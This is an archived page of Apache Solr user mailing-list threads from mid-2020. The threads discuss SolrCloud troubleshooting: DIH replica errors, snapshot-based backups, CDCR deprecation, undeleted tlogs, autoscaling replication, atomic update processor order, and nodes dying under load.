> If using DIH on SolrCloud is not recommended, please let me know about this.
> 
> Thanks,
> Issei


DIH on SolrCloud

2020-08-13 Thread Issei Nishigata
Hi, All

I'm using Solr4.10 with SolrCloud mode.
I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I will
call this Node1 to Node10 for convenience)
-> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
Indexing always uses DIH of Node2. Therefore, DIH may be executed when
Node2 is Leader or Replica.
Node2 is not forcibly set to Leader when DIH is executed.

At one point, when Node2 executed DIH in the Replica state, the following
error in Node9 occurred.

[updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
- org.apache.solr.client.solrj.SolrServerException: IOException occured
when talking to server at: http://samplehost:8983/solr/test_shard1_replica9

I think this is the error while sending data from Node2 to Node9. And Node9
couldn't respond for some reason.

The error occurs sometimes however it is not reproducible so that the
investigation is troublesome.
Is there any possible cause for this problem? I am worrying about if it is
doing Solr anti-pattern.
The thing is, when running DIH by Node2 as Replica, the above error occurs
towards Node1 as Leader,
then soon after, all the nodes might be returning to the index of the
Node1.
Do you think my understanding makes sense?

If using DIH on SolrCloud is not recommended, please let me know about this.

Thanks,
Issei


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Bram Van Dam
On 11/08/2020 13:15, Erick Erickson wrote:
> CDCR is being deprecated. so I wouldn’t suggest it for the long term.

Ah yes, thanks for pointing that out. That makes Dominique's alternative
less attractive. I guess I'll stick to my original proposal!

Thanks Erick :-)

 - Bram


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Dominique Bejean
An idea could be use autoscaling API in order to add a PULL replica for
each shard located in one or more low resource backup dedicated nodes in
separate hardware.
However, we need to exclude these "PULL backup replica" from searches.
Unfortunately, I am not aware of this possibility.
For better RPO, TLOG replica would be better, but it could become an NRT
replica.

So, may be one solution could be create a new BACKUP replica type with
these characteristics :

   - According to RPO, options at creation time : based on PULL or TLOG
   sync mode
   - Search disabled


Dominique



Le mar. 11 août 2020 à 14:07, Erick Erickson  a
écrit :

> Dominique:
>
> Alternatives are under discussion, there isn’t a recommendation yet.
>
> Erick
>
> > On Aug 11, 2020, at 7:49 AM, Dominique Bejean 
> wrote:
> >
> > I missed that !
> > Are you aware about an alternative ?
> >
> > Regards
> >
> > Dominique
> >
> >
> > Le mar. 11 août 2020 à 13:15, Erick Erickson  a
> > écrit :
> >
> >> CDCR is being deprecated. so I wouldn’t suggest it for the long term.
> >>
> >>> On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh 
> >> wrote:
> >>>
> >>> I would love an answer to this too!
> >>>
> >>> On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam 
> >> wrote:
> >>>
> >>>> Hey folks,
> >>>>
> >>>> Been reading up about the various ways of creating backups. The whole
> >>>> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> >>>> our environment, so I've been looking for ways around that, and here's
> >>>> what I've come up with so far:
> >>>>
> >>>> 1. Stop applications from writing to solr
> >>>>
> >>>> 2. Commit everything
> >>>>
> >>>> 3. Identify a single core for each shard in each collection
> >>>>
> >>>> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
> >>>>
> >>>> 5. Once complete, re-enable application write access to Solr
> >>>>
> >>>> 6. Create a backup from these snapshots using the replication
> handler's
> >>>> backup function (replication?command=backup=mySnapshot)
> >>>>
> >>>> 7. Put the backups somewhere safe
> >>>>
> >>>> 8. Clean up snapshots
> >>>>
> >>>>
> >>>> This seems ... too good to be true? I've seen so many threads about
> how
> >>>> hard it is to create backups in SolrCloud on this mailing list over
> the
> >>>> years, but this seems pretty straightforward? Am I missing some
> >>>> glaringly obvious reason why this will fail catastrophically?
> >>>>
> >>>> Using Solr 7.7 in this case.
> >>>>
> >>>> Feedback much appreciated!
> >>>>
> >>>> Thanks,
> >>>>
> >>>> - Bram
> >>>>
> >>>
> >>> --
> >>> **
> >>> ** <https://www.canva.com/>Empowering the world to design
> >>> Share accurate
> >>> information on COVID-19 and spread messages of support to your
> community.
> >>>
> >>> Here are some resources
> >>> <
> >>
> https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates
> >
> >>
> >>> that can help.
> >>> <https://twitter.com/canva> <https://facebook.com/canva>
> >>> <https://au.linkedin.com/company/canva> <https://twitter.com/canva>
> >>> <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>
> >>> <https://instagram.com/canva>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>
> >>
>
>


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Erick Erickson
Dominique:

Alternatives are under discussion, there isn’t a recommendation yet.

Erick

> On Aug 11, 2020, at 7:49 AM, Dominique Bejean  
> wrote:
> 
> I missed that !
> Are you aware about an alternative ?
> 
> Regards
> 
> Dominique
> 
> 
> Le mar. 11 août 2020 à 13:15, Erick Erickson  a
> écrit :
> 
>> CDCR is being deprecated. so I wouldn’t suggest it for the long term.
>> 
>>> On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh 
>> wrote:
>>> 
>>> I would love an answer to this too!
>>> 
>>> On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam 
>> wrote:
>>> 
>>>> Hey folks,
>>>> 
>>>> Been reading up about the various ways of creating backups. The whole
>>>> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
>>>> our environment, so I've been looking for ways around that, and here's
>>>> what I've come up with so far:
>>>> 
>>>> 1. Stop applications from writing to solr
>>>> 
>>>> 2. Commit everything
>>>> 
>>>> 3. Identify a single core for each shard in each collection
>>>> 
>>>> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>>>> 
>>>> 5. Once complete, re-enable application write access to Solr
>>>> 
>>>> 6. Create a backup from these snapshots using the replication handler's
>>>> backup function (replication?command=backup=mySnapshot)
>>>> 
>>>> 7. Put the backups somewhere safe
>>>> 
>>>> 8. Clean up snapshots
>>>> 
>>>> 
>>>> This seems ... too good to be true? I've seen so many threads about how
>>>> hard it is to create backups in SolrCloud on this mailing list over the
>>>> years, but this seems pretty straightforward? Am I missing some
>>>> glaringly obvious reason why this will fail catastrophically?
>>>> 
>>>> Using Solr 7.7 in this case.
>>>> 
>>>> Feedback much appreciated!
>>>> 
>>>> Thanks,
>>>> 
>>>> - Bram
>>>> 
>>> 
>>> --
>>> **
>>> ** <https://www.canva.com/>Empowering the world to design
>>> Share accurate
>>> information on COVID-19 and spread messages of support to your community.
>>> 
>>> Here are some resources
>>> <
>> https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
>> 
>>> that can help.
>>> <https://twitter.com/canva> <https://facebook.com/canva>
>>> <https://au.linkedin.com/company/canva> <https://twitter.com/canva>
>>> <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>
>>> <https://instagram.com/canva>
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>> 
>> 



Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Dominique Bejean
I missed that !
Are you aware about an alternative ?

Regards

Dominique


Le mar. 11 août 2020 à 13:15, Erick Erickson  a
écrit :

> CDCR is being deprecated. so I wouldn’t suggest it for the long term.
>
> > On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh 
> wrote:
> >
> > I would love an answer to this too!
> >
> > On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam 
> wrote:
> >
> >> Hey folks,
> >>
> >> Been reading up about the various ways of creating backups. The whole
> >> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> >> our environment, so I've been looking for ways around that, and here's
> >> what I've come up with so far:
> >>
> >> 1. Stop applications from writing to solr
> >>
> >> 2. Commit everything
> >>
> >> 3. Identify a single core for each shard in each collection
> >>
> >> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
> >>
> >> 5. Once complete, re-enable application write access to Solr
> >>
> >> 6. Create a backup from these snapshots using the replication handler's
> >> backup function (replication?command=backup=mySnapshot)
> >>
> >> 7. Put the backups somewhere safe
> >>
> >> 8. Clean up snapshots
> >>
> >>
> >> This seems ... too good to be true? I've seen so many threads about how
> >> hard it is to create backups in SolrCloud on this mailing list over the
> >> years, but this seems pretty straightforward? Am I missing some
> >> glaringly obvious reason why this will fail catastrophically?
> >>
> >> Using Solr 7.7 in this case.
> >>
> >> Feedback much appreciated!
> >>
> >> Thanks,
> >>
> >> - Bram
> >>
> >
> > --
> > **
> > ** <https://www.canva.com/>Empowering the world to design
> > Share accurate
> > information on COVID-19 and spread messages of support to your community.
> >
> > Here are some resources
> > <
> https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
>
> > that can help.
> > <https://twitter.com/canva> <https://facebook.com/canva>
> > <https://au.linkedin.com/company/canva> <https://twitter.com/canva>
> > <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>
> > <https://instagram.com/canva>
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
>
>


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Erick Erickson
CDCR is being deprecated. so I wouldn’t suggest it for the long term.

> On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh  wrote:
> 
> I would love an answer to this too!
> 
> On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam  wrote:
> 
>> Hey folks,
>> 
>> Been reading up about the various ways of creating backups. The whole
>> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
>> our environment, so I've been looking for ways around that, and here's
>> what I've come up with so far:
>> 
>> 1. Stop applications from writing to solr
>> 
>> 2. Commit everything
>> 
>> 3. Identify a single core for each shard in each collection
>> 
>> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>> 
>> 5. Once complete, re-enable application write access to Solr
>> 
>> 6. Create a backup from these snapshots using the replication handler's
>> backup function (replication?command=backup=mySnapshot)
>> 
>> 7. Put the backups somewhere safe
>> 
>> 8. Clean up snapshots
>> 
>> 
>> This seems ... too good to be true? I've seen so many threads about how
>> hard it is to create backups in SolrCloud on this mailing list over the
>> years, but this seems pretty straightforward? Am I missing some
>> glaringly obvious reason why this will fail catastrophically?
>> 
>> Using Solr 7.7 in this case.
>> 
>> Feedback much appreciated!
>> 
>> Thanks,
>> 
>> - Bram
>> 
> 
> -- 
> **
> ** <https://www.canva.com/>Empowering the world to design
> Share accurate 
> information on COVID-19 and spread messages of support to your community.
> 
> Here are some resources 
> <https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
>  
> that can help.
> <https://twitter.com/canva> <https://facebook.com/canva> 
> <https://au.linkedin.com/company/canva> <https://twitter.com/canva>  
> <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>  
> <https://instagram.com/canva>
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 



Re: Solrcloud tlog are not deleted

2020-08-11 Thread Dominique Bejean
Hi,

Did you disable CDCR buffer ?
solr//cdcr?action=DISABLEBUFFER

You can check with "cdcr?action=STATUS"

Regards

Dominique


Le mar. 11 août 2020 à 10:57, Michel Bamouni  a
écrit :

> Hello,
>
>
> We had setup a synchronization between our solr instances on 2 datacenters
> by using  the CDCR.
> until now, every thing worked fine but after an upgrade from solr 7.3 to
> solr 7.7, we are facing an issue.
> Indeed, our tlog files are not deleted even if we see the new values on
> the  two solr.
> It is like that the hard commit doesn't occur.
> In our solrconfig.xml file, we had configure the autocommit as below :
>
>
> 
>   ${solr.autoCommit.maxTime:15000}
>   false
> 
>
>
> and the softautocommit looks like that:
>
> 
>   ${solr.autoSoftCommit.maxTime:-1}
> 
>
>
> if someone has already meet this issue, I'm looking for your return.
>
>
> Best regards,
>
>
> Michel
>
>


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Dominique Bejean
  Hi,

This procedure looks fine but it is a little complexe to automatize.

Why not consider backup based on CDCR for Solrcloud or Replication for Solr
standalone ?

For Solrcloud, CDCR can be configured with source and target collections in
the same Solrcloud cluster. The target collection can have their shards
located in dedicated nodes and replication factor set to 1.

You need to be careful of locating target nodes on separate hardware (VM
and storage) and ideally in separate geographical locations.

You will be able to achieve very good RPO and RTO.
If RTO is not high, the dedicated nodes for backup destination can have few
CPU and RAM
If RTO is high we can imagine the backup becomes the live collection very
fast instead of restore or in degraded search only mode during restore.

Regards.

Dominique



Le jeu. 6 août 2020 à 16:18, Bram Van Dam  a écrit :

> Hey folks,
>
> Been reading up about the various ways of creating backups. The whole
> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> our environment, so I've been looking for ways around that, and here's
> what I've come up with so far:
>
> 1. Stop applications from writing to solr
>
> 2. Commit everything
>
> 3. Identify a single core for each shard in each collection
>
> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>
> 5. Once complete, re-enable application write access to Solr
>
> 6. Create a backup from these snapshots using the replication handler's
> backup function (replication?command=backup=mySnapshot)
>
> 7. Put the backups somewhere safe
>
> 8. Clean up snapshots
>
>
> This seems ... too good to be true? I've seen so many threads about how
> hard it is to create backups in SolrCloud on this mailing list over the
> years, but this seems pretty straightforward? Am I missing some
> glaringly obvious reason why this will fail catastrophically?
>
> Using Solr 7.7 in this case.
>
> Feedback much appreciated!
>
> Thanks,
>
>  - Bram
>


Solrcloud tlog are not deleted

2020-08-11 Thread Michel Bamouni
Hello,


We had setup a synchronization between our solr instances on 2 datacenters by 
using  the CDCR.
until now, every thing worked fine but after an upgrade from solr 7.3 to solr 
7.7, we are facing an issue.
Indeed, our tlog files are not deleted even if we see the new values on the  
two solr.
It is like that the hard commit doesn't occur.
In our solrconfig.xml file, we had configure the autocommit as below :



  ${solr.autoCommit.maxTime:15000}
  false



and the softautocommit looks like that:


  ${solr.autoSoftCommit.maxTime:-1}



if someone has already meet this issue, I'm looking for your return.


Best regards,


Michel



Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-10 Thread Ashwin Ramesh
I would love an answer to this too!

On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam  wrote:

> Hey folks,
>
> Been reading up about the various ways of creating backups. The whole
> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> our environment, so I've been looking for ways around that, and here's
> what I've come up with so far:
>
> 1. Stop applications from writing to solr
>
> 2. Commit everything
>
> 3. Identify a single core for each shard in each collection
>
> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>
> 5. Once complete, re-enable application write access to Solr
>
> 6. Create a backup from these snapshots using the replication handler's
> backup function (replication?command=backup=mySnapshot)
>
> 7. Put the backups somewhere safe
>
> 8. Clean up snapshots
>
>
> This seems ... too good to be true? I've seen so many threads about how
> hard it is to create backups in SolrCloud on this mailing list over the
> years, but this seems pretty straightforward? Am I missing some
> glaringly obvious reason why this will fail catastrophically?
>
> Using Solr 7.7 in this case.
>
> Feedback much appreciated!
>
> Thanks,
>
>  - Bram
>

-- 
**
** <https://www.canva.com/>Empowering the world to design
Share accurate 
information on COVID-19 and spread messages of support to your community.

Here are some resources 
<https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
 
that can help.
 <https://twitter.com/canva> <https://facebook.com/canva> 
<https://au.linkedin.com/company/canva> <https://twitter.com/canva>  
<https://facebook.com/canva>  <https://au.linkedin.com/company/canva>  
<https://instagram.com/canva>












Replication not occurring to newly added SOLRCloud nodes

2020-08-10 Thread Shane Brooks
Main info: SOLRCloud 7.7.3, Zookeeper 3.4.14

I have a 2 node SOLRCloud installation, 3 zookeeper instances, configured in 
AWS to autoscale. I am currently testing with 9 collections. My issue is that 
when I scale out and a node is added to the SOLRCloud cluster,
I get replication to the new node from only one of the 9 collections.

https://i.imgur.com/xR7PQxf.gif


autoAddReplicas=true for each of the 9 collections.


I have set the following rules:

# maintain 2 replicas of each shard
curl -X POST "http://localhost:8983/solr/admin/autoscaling; --data-binary \
'{
  "set-cluster-policy": [
{ "replica": "2","shard": "#EACH", "node": "#ANY" }
  ]
}'


# listen for a nodeAdded event and upon 5 seconds of receiving begin 
replicating our existing collection(s) to the new node.
curl -X POST "http://localhost:8983/solr/admin/autoscaling; --data-binary \
'{
  "set-trigger": {
"name": "node_added_trigger",
"event": "nodeAdded",
"waitFor": "5s",
"preferredOperation": "ADDREPLICA"
  }
}'



All of the collections were set up identically. What else do I need to do to 
automatically force replication to nodes when they are added to the cluster?

Thanks in advance,
Shane Brooks



Backups in SolrCloud using snapshots of individual cores?

2020-08-06 Thread Bram Van Dam
Hey folks,

Been reading up about the various ways of creating backups. The whole
"shared filesystem for Solrcloud backups"-thing is kind of a no-go in
our environment, so I've been looking for ways around that, and here's
what I've come up with so far:

1. Stop applications from writing to solr

2. Commit everything

3. Identify a single core for each shard in each collection

4. Snapshot that core using CREATESNAPSHOT in the Collections API

5. Once complete, re-enable application write access to Solr

6. Create a backup from these snapshots using the replication handler's
backup function (replication?command=backup=mySnapshot)

7. Put the backups somewhere safe

8. Clean up snapshots


This seems ... too good to be true? I've seen so many threads about how
hard it is to create backups in SolrCloud on this mailing list over the
years, but this seems pretty straightforward? Am I missing some
glaringly obvious reason why this will fail catastrophically?

Using Solr 7.7 in this case.

Feedback much appreciated!

Thanks,

 - Bram


Re: SolrCloud on PublicCloud

2020-08-03 Thread Shawn Heisey

On 8/3/2020 12:04 PM, Mathew Mathew wrote:

Have been looking for architectural guidance on correctly configuring SolrCloud 
on Public Cloud (eg Azure/AWS)
In particular the zookeeper based autoscaling seems to overlap with the auto 
scaling capabilities of cloud platforms.

I have the following questions.

   1.  Should the ZooKeeper ensable be put in a autoscaling group. This seems 
to be a no, since the SolrNodes need to register against a static list of 
Zookeeper ips.


Correct.  There are features in ZK 3.5 for dynamic server membership, 
but in general it is better to have a static list.  The client must be 
upgraded as well for that feature to work.  The ZK client was upgraded 
to a 3.5 version in Solr 8.2.0.  I don't think we have done any testing 
of the dynamic membership feature.


ZK is generally best set up with either 3 or 5 servers, depending on the 
level of redundancy desired, and left alone unless there's a problem. 
With 3 servers, the ensemble can survive the failure of 1 server.  With 
5, it can survive the failure of 2.  As far as I know, getting back to 
full redundancy is best handled as a manual process, even if running 
version 3.5.



   2.  Should the SolrNodes be put in a AutoScaling group? Or should we just 
launch/register SolrNodes using a lambda function/Azure function.


That really depends on what you're doing.  There is no "one size fits 
most" configuration.


I personally would avoid setting things up in a way that results in Solr 
nodes automatically being added or removed.  Adding a node will 
generally result in a LOT of data being copied, and that can impact 
performance in a major way, so adding nodes should be scheduled to 
minimize impact.  If it's automatic in response to high load, adding a 
node can make performance a lot worse before it gets better.  When a 
node disappears, manual action is required for SolrCloud to forget the node.



   3.  Should the SolrNodes be associated with local storage or should they be 
attached to shared storage volumes.


Lucene (which provides most of Solr's functionality) generally does not 
like to work with shared storage.  In addition to potential latency 
issues for storage connected via a network, Lucene works extremely hard 
to ensure that only one process can open an index.  Using shared storage 
will encourage attempts to share the index directory between multiple 
processes, which almost always fails to work.


Things work best with locally attached storage utilizing an extremely 
fast connection method (like SATA or SCSI), and a locally handled 
filesystem.  Lucene uses some pretty involved file locking mechanisms, 
which often do not work well on remote or shared filesystems.


---

We (the developers that build this software) generally have a very 
near-sighted view of things, not really caring about details like the 
hardware deployment.  That probably needs to change a little bit, 
particularly when it comes to documentation.


Thanks,
Shawn


SolrCloud on PublicCloud

2020-08-03 Thread Mathew Mathew
Have been looking for architectural guidance on correctly configuring SolrCloud 
on Public Cloud (eg Azure/AWS)
In particular the zookeeper based autoscaling seems to overlap with the auto 
scaling capabilities of cloud platforms.

I have the following questions.

  1.  Should the ZooKeeper ensable be put in a autoscaling group. This seems to 
be a no, since the SolrNodes need to register against a static list of 
Zookeeper ips.
  2.  Should the SolrNodes be put in a AutoScaling group? Or should we just 
launch/register SolrNodes using a lambda function/Azure function.
  3.  Should the SolrNodes be associated with local storage or should they be 
attached to shared storage volumes.

Seems like this would be a solved problem with established patterns, however 
could not find any documentation on it.
Appreciate insights from those, who have been here before.

Thanks,

Mathew
This email and the information contained herein is proprietary and confidential 
and subject to the Amdocs Email Terms of Service, which you may review at 
https://www.amdocs.com/about/email-terms-of-service 
<https://www.amdocs.com/about/email-terms-of-service>


SolrCloud SSL Encryption

2020-08-03 Thread Mathew Mathew
According to the documentation.

https://lucene.apache.org/solr/guide/8_6/enabling-ssl.html

ZooKeeper does not support encrypted communication with clients like Solr. 
There are several related JIRA tickets where SSL support is being 
planned/worked on: 
ZOOKEEPER-235; 
ZOOKEEPER-236; 
ZOOKEEPER-1000; and 
ZOOKEEPER-2120.

However three of those linked tickets are closed. Wondering if there is a more 
recent update on this and if it is possible now to encrypt between Solr and 
Zookeeper.


Thanks,

Mathew

This email and the information contained herein is proprietary and confidential 
and subject to the Amdocs Email Terms of Service, which you may review at 
https://www.amdocs.com/about/email-terms-of-service 



Re: AtomicUpdate on SolrCloud is not working

2020-07-20 Thread Shawn Heisey

On 7/19/2020 1:37 AM, yo tomi wrote:

I have no choice but use post-processor.
However bug of SOLR-8030 makes me not feel like using it.


Can you explain why you need the trim field and remove blank field 
processors to be post processors?  When I think about these 
functionalities, they should work fully as expected even when executed 
as "pre" processors.


Thanks,
Shawn


Re: AtomicUpdate on SolrCloud is not working

2020-07-19 Thread yo tomi
Hi Jörn & shown
"does not work properly" means pre-processors
(TrimFieldUpdateProcessorFactory and
RemoveBlankFieldUpdateProcessorFactory) don't trim and remove blank for
string fields.

example:

When the following schema:
---
  
  
---

update following documents with "Documents" of solr admin:
---
{
"id": "1",
"title": {"set": " test "}
},
{
"id": "2",
"title": {set": ""}
}
---

Then the follows are indexed, when pre-processor:
---
{
"id": "1",
"title": " test "
},
{
"id": "2",
"title": ""
}
---

When post-processor:
---
{
"id": "1",
"title": "test"
},
{
"id": "2"
}
---

I have no choice but use post-processor.
However bug of SOLR-8030 makes me not feel like using it.

By the way, version of solr is 8.4.

Best,
Yoshiaki


Re: AtomicUpdate on SolrCloud is not working

2020-07-18 Thread Shawn Heisey

On 7/17/2020 1:32 AM, yo tomi wrote:

When I did AtomicUpdate on SolrCloud by the following setting, it does
not work properly.


As Jörn Franke already mentioned, you haven't said exactly what "does 
not work properly" actually means in your situation.  Without that 
information, it will be very difficult to provide any real help.


Atomic update functionality is currently implemented in 
DistributedUpdateProcessorFactory.



---

  
  
  
  
  

---
When changed as follows and made it work, it became as expected.
---

  
  
  
  

---


The effective result difference between these configurations is that 
atomic updates will happen first with the first config, and in the 
second, atomic updates will happen second to last -- just before 
RunUpdateProcessorFactory.


Also, with the first config, most of the update processors are going to 
be executed on the machine with the shard leader (after the update is 
distributed) and if there is more than one NRT replica, they will be 
executed multiple times.  With the second config, most of the processors 
will be executed on the machine that actually receives the update 
request.  For the purposes of that discussion, remember that when a PULL 
replica is elected leader, it is effectively an NRT replica.


Does that information help you determine why it doesn't do what you expect?


The later setting and the way of using post-processor could make the
same result, I though,
but using post-processor, bug of SOLR-8030 makes me not feel like using it.
By the latter setting even, is there any possibility of SOLR-8030 to
become?


See this part of the reference guide for a bunch of gory details about 
DistributedUpdateProcessorFactory:


https://cwiki.apache.org/confluence/display/SOLR/UpdateRequestProcessor#UpdateRequestProcessor-DistributedUpdates

In SOLR-8030, the general consensus among committers is that you should 
configure almost all update processors as "pre" processors -- placed 
before DistributedUpdatePorcessorFactory in the config.  When done this 
way, updates are usually faster and less likely to yield inconsistent 
results.


There may be situations where having them as "post" processors is 
correct, but that won't happen very often.  The second config above does 
implicitly use "pre" for most of the processors.


Thanks,
Shawn


Re: AtomicUpdate on SolrCloud is not working

2020-07-17 Thread Issei Nishigata
I have the same problem in my Solr8.
I think it's because in the first way,
TrimFieldUpdateProcessorFactory and RemoveBlankFieldUpdateProcessorFactory
is not taking effect.

On SolrCloud, TrimFieldUpdateProcessorFactory,
RemoveBlankFieldUpdateProcessorFactory and other processors
only run on the first node that receives an update request.
Consequently, it's necessary to execute TrimFieldUpdateProcessorFactory and
RemoveBlankFieldUpdateProcessorFactory
after giving the document to the replica node using the
DistributedUpdateProcessor,
so we need to use the second way that he described otherwise it won't
operate properly.

But even with this way, both I and he are worried whether it will be cause
of SOLR-8030.
I also want to know about this, does anyone have any comment about this?


Best,
Issei

2020年7月17日(金) 18:34 Jörn Franke :

> What does „not work correctly mean“?
>
> Have you checked that all fields are stored or doc values?
>
> > Am 17.07.2020 um 11:26 schrieb yo tomi :
> >
> > Hi All
> >
> > Sorry, above settings are contrary with each other.
> > Actually, following setting does not work properly.
> > ---
> > 
> > 
> > 
> > 
> > 
> > 
> > ---
> > And follows is working as expected.
> > ---
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > ---
> >
> > Thanks,
> > Yoshiaki
> >
> >
> > 2020年7月17日(金) 16:32 yo tomi :
> >
> >> Hi, All
> >> When I did AtomicUpdate on SolrCloud by the following setting, it does
> not work properly.
> >>
> >> ---
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> ---
> >> When changed as follows and made it work, it became as expected.
> >> ---
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> ---
> >> The later setting and the way of using post-processor could make the
> same result, I though,
> >> but using post-processor, bug of SOLR-8030 makes me not feel like using
> it.
> >> By the latter setting even, is there any possibility of SOLR-8030 to
> become? Seeing the source code, tlog which is from leader comes to Replica
> seems to be processed correctly with UpdateRequestProcessor,
> >> the latter setting had not been the right one for the bug, I
> though.Anyone knows the most appropriate way to configure AtomicUpdate on
> SolrCloud?
> >>
> >> Thanks,
> >> Yoshiaki
> >>
> >>
>


Re: AtomicUpdate on SolrCloud is not working

2020-07-17 Thread Jörn Franke
What does „not work correctly mean“?

Have you checked that all fields are stored or doc values?

> Am 17.07.2020 um 11:26 schrieb yo tomi :
> 
> Hi All
> 
> Sorry, above settings are contrary with each other.
> Actually, following setting does not work properly.
> ---
> 
> 
> 
> 
> 
> 
> ---
> And follows is working as expected.
> ---
> 
> 
> 
> 
> 
> 
> 
> ---
> 
> Thanks,
> Yoshiaki
> 
> 
> 2020年7月17日(金) 16:32 yo tomi :
> 
>> Hi, All
>> When I did AtomicUpdate on SolrCloud by the following setting, it does not 
>> work properly.
>> 
>> ---
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> ---
>> When changed as follows and made it work, it became as expected.
>> ---
>> 
>> 
>> 
>> 
>> 
>> 
>> ---
>> The later setting and the way of using post-processor could make the same 
>> result, I though,
>> but using post-processor, bug of SOLR-8030 makes me not feel like using it.
>> By the latter setting even, is there any possibility of SOLR-8030 to become? 
>> Seeing the source code, tlog which is from leader comes to Replica seems to 
>> be processed correctly with UpdateRequestProcessor,
>> the latter setting had not been the right one for the bug, I though.Anyone 
>> knows the most appropriate way to configure AtomicUpdate on SolrCloud?
>> 
>> Thanks,
>> Yoshiaki
>> 
>> 


Re: AtomicUpdate on SolrCloud is not working

2020-07-17 Thread yo tomi
Hi All

Sorry, above settings are contrary with each other.
Actually, following setting does not work properly.
---

 
 
 
 

---
And follows is working as expected.
---

 
 
 
 
 

---

Thanks,
Yoshiaki


2020年7月17日(金) 16:32 yo tomi :

> Hi, All
> When I did AtomicUpdate on SolrCloud by the following setting, it does not 
> work properly.
>
> ---
> 
>  
>  
>  
>  
>  
> 
> ---
> When changed as follows and made it work, it became as expected.
> ---
> 
>  
>  
>  
>  
> 
> ---
> The later setting and the way of using post-processor could make the same 
> result, I though,
> but using post-processor, bug of SOLR-8030 makes me not feel like using it.
> By the latter setting even, is there any possibility of SOLR-8030 to become? 
> Seeing the source code, tlog which is from leader comes to Replica seems to 
> be processed correctly with UpdateRequestProcessor,
> the latter setting had not been the right one for the bug, I though.Anyone 
> knows the most appropriate way to configure AtomicUpdate on SolrCloud?
>
> Thanks,
> Yoshiaki
>
>


AtomicUpdate on SolrCloud is not working

2020-07-17 Thread yo tomi
Hi, All
When I did AtomicUpdate on SolrCloud by the following setting, it does
not work properly.

---

 
 
 
 
 

---
When changed as follows and made it work, it became as expected.
---

 
 
 
 

---
The later setting and the way of using post-processor could make the
same result, I though,
but using post-processor, bug of SOLR-8030 makes me not feel like using it.
By the latter setting even, is there any possibility of SOLR-8030 to
become? Seeing the source code, tlog which is from leader comes to
Replica seems to be processed correctly with UpdateRequestProcessor,
the latter setting had not been the right one for the bug, I
though.Anyone knows the most appropriate way to configure AtomicUpdate
on SolrCloud?

Thanks,
Yoshiaki


Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
 
*total thread is 25.6k when solr hang.
On Sunday, July 5, 2020, 2:55:26 AM GMT+7, Tran Van Hoan 
 wrote:  
 
  All server only run Solr, zookeeper, exporters (node-exporter, 
process-exporter, solr-exporter, zoo-exporter). 
- network: no package loss, TCP no issue before incident, TCP drop around 
100-200/s when incident and overflow ~100 in somaxcon.
- total mem Avalilable is greater 25G (Solr's XMX = 30G)- CPU < 10%, no high 
load average 5, 15 (except when solr hang, high load average is high)- Normally 
total process is around ~2k, when incident occurs, total thread is 25.6 (solr 
out of cluster but still running)- low TCP contrack- Swapiness = 0 and no use 
swap;- Solr cloud has 2 collections, only one collection down causes node down 
(the remain collection is still green)

On Sunday, July 5, 2020, 1:30:59 AM GMT+7, Rodrigo Oliveira 
 wrote:  
 
 Network it's ok? Between nodes? The use? Swap it's disabled? Swapiness rhe
value it's 0?

Em sáb, 4 de jul de 2020 15:19, Tran Van Hoan
 escreveu:

>  I used physical servers, and IO wait is small :(!!!I saw that iptables
> dropped all ACK message from clients (not only client solr, prometheus
> scape metric from exporter was dropped too).all when i check netstat
> -anp|grep 8983, all socket are TIME_WAIT state.Only restart solrs, the
> incident was resolved. Total request around 2.5k request per second per
> node.
>
>    On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira <
> adamantina.rodr...@gmail.com> wrote:
>
>  Hi,
